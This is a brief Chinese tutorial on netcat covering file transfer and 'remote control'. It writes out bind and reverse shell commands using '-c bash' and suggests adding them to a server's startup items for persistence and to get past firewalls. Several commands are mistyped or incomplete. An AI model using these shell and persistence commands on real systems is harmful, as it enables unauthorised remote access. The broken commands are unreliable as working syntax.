nc（瑞士军刀）

一、nc（瑞士军刀）

1、-v 输出详细的信息 -n 如果后面是域名不会进行dns解析(telnet)

2、文本传输:

类似于socket一个作为服务端，一个作为客户端。

服务端：nc -l -p 端口

客户端： nc -vn ip port

在电子取证的时候会用到。用 | 管道符将客户端输出的结果发送到服务端。

传输文件：

接收方： nc -lp 333>1.txt 

发送方：nc -nv 111.11.11.11 333  <2 .txr

3、目录传输

tar -cvf  - xu 

4、远程控制

方法一； nc -lp 333 -c bash(nc -vn 192.168.22.22 333)

方法二：nc -lp 333 (nc -vn -192.145.11.1 333 -c bash)

可以将该命令写成脚本，然后放在服务器的开机启动项里面。有些网站因为防火墙进制第一种方式，所以可以采用第二种方式。

在window用户中应将bash 改为cmd 

5、缺陷

1、明文传输，容易被嗅探（可以通过系统加密方法）

2、缺乏身份验证机制，不安全，容易被其他人盗用。